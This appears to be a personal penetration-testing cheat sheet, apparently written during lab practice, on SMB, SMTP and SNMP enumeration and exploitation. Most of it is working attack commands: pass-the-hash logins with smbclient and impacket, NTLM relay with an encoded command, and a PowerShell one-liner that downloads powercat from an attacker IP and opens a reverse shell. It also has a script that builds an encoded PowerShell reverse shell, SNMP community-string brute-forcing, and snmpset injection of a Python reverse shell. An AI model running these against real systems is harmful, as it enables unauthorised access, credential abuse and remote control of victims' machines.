SMB,SMTP,SNMP enum

SMB attack

tools of manage smb and enum:
enum4linux
CrackMapExec
smbclient

smbclient -L //ip

login by hash

smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
dir
get secrets.txt

• -U set user
• --pw-nt-hash use passwd hash

login by passwd

smbclient  \\\\172.16.205.11\\test -U joe --password=Flowers1

tools of command excute:
impacket-wmiexec
impacket-psexec
use hash

impacket-psexec -hashes 00000000000000000000000000000000:b2c03054c306ac8fc5f9d188710b0168 administrator@192.168.214.121

impacket-wmiexec -hashes 00000000000000000000000000000000:2892d26cdf84d7a70e2eb3b9f05c425e Administrator@192.168.216.70

• -hashs use “LMHash:NTHash”,if there was no LM,use 32bit 0
• second parameter: “username@ip”

use passwd to get a shell

impacket-smbexec MEDTECH/joe:Flowers1@172.16.205.11

impacket-ntlmrelayx
smb-relay passwd-hash(u cant crack)no UAC
this module could relay a command to the target use the hash of passwd,if they have the same hash

users:
machine:FILE01 FILE02
users in FILE01:
sam administrator file02admin
users in FILE02:
dave administrator file02admin

so if we have the hash of authencation message of file02admin,we could use the hash of authencation to pass the authencation of FILE02 and excute the command
the authencation about smb (Net-NTLMv2)

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."

powershell reverse shell one-liner

powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.210/powercat.ps1');powercat -c 192.168.45.210 -p 4444 -e cmd

https://www.base64encode.org/ encode the liner by utf-16le charset

reverse shell just powershell

import sys
import base64

payload = '$client = New-Object System.Net.Sockets.TCPClient("192.168.205.121",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

cmd = "powershell -nop -w hidden -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()

print(cmd)

• --no-http-server ban http server cause we use smb relay
• -t set the target
• -smb2support add the support to smb2
• -c set the command
  in the FILE01 machine

  dir \\192.168.45.210\test

check the dir of smb

#powershell
ls \\192.168.1.1\share
cmd
dir \\192.168.1.1\share

net view(Windows)

net view \\name /all

nbtscan

SMTP

skip!!!

enum

snmp hacktricks
SNMP MIB tree

id	name
1.3.6.1.2.1.25.1.6.0	System Processes
1.3.6.1.2.1.25.4.2.1.2	Running Programs
1.3.6.1.2.1.25.4.2.1.4	Processes Path
1.3.6.1.2.1.25.2.3.1.4	Storage Units
1.3.6.1.2.1.25.6.3.1.2	Software Name
1.3.6.1.4.1.77.1.2.25	User Accounts
1.3.6.1.2.1.6.13.1.3	TCP Local Ports

public common string

public
private
manager

scan a range:

echo public > community
echo private >> community
echo manager >> community
for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips
onesixtyone -c community -i ips

tools:
snmpwalk:
enume the hole tree

snmpwalk -c public -Oa -v1 -t 10 192.168.214.149

• -c set community string
• -Oa This parameter will automatically translate any hexadecimal string into ASCII that was otherwise not decoded.
• -v1 specify the SNMP version number
• -t set the timeout period
  enum the users(set OID 1.3.6.1.4.1.77.1.2.25 in the table)

  snmpwalk -c public -v1 192.168.240.149 1.3.6.1.4.1.77.1.2.25

  enum the process

  snmpwalk -c public -v1 192.168.240.149 1.3.6.1.2.1.25.4.2.1.2

  enum the software installed

  snmpwalk -c public -v1 192.168.240.149 1.3.6.1.2.1.25.6.3.1.2

  enum the listening tcp port

  snmpwalk -c public -v1 192.168.240.149 1.3.6.1.2.1.6.13.1.3

  enum

  snmpwalk -v 2c -c public 192.168.240.149 NET-SNMP-EXTEND-MIB::nsExtendOutputFull

  brute

  msf> use auxiliary/scanner/snmp/snmp_login
  nmap -sU --script snmp-brute 192.168.214.149 --script-args snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 
  onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt 192.168.214.149
  hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.214.149 snmp

RCE in snmp

SNMP RCE hacktricks
if u enum the run-on-read(),it could rce

snmpwalk -v2c -c public 192.168.214.149 NET-SNMP-EXTEND-MIB::nsExtendObjects

test:
inject the command

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c public 192.168.214.149 \
'nsExtendStatus."evilcommand"' = createAndGo \
'nsExtendCommand."evilcommand"' = /bin/echo \
'nsExtendArgs."evilcommand"' = 'hello world'

excute it

snmpwalk -v2c -c SuP3RPrivCom90 10.129.2.26 NET-SNMP-EXTEND-MIB::nsExtendObjects

inject the revserse shell
https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3.6 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.10.14.84\",8999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'

listen the port and excute it

snmpwalk -v2c -c public 192.168.214.149 NET-SNMP-EXTEND-MIB::nsExtendObjects

or exploit
https://github.com/mxrch/snmp-shell

sudo apt install snmp snmp-mibs-downloader rlwrap -y
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt

usage:

rlwrap python3 shell.py 192.168.214.149 -c public

if u need excute long command like u ssh publickey,u need to run the legacy.py
use a ed25519 SSH publickey, not a RSA one, it’s shorter.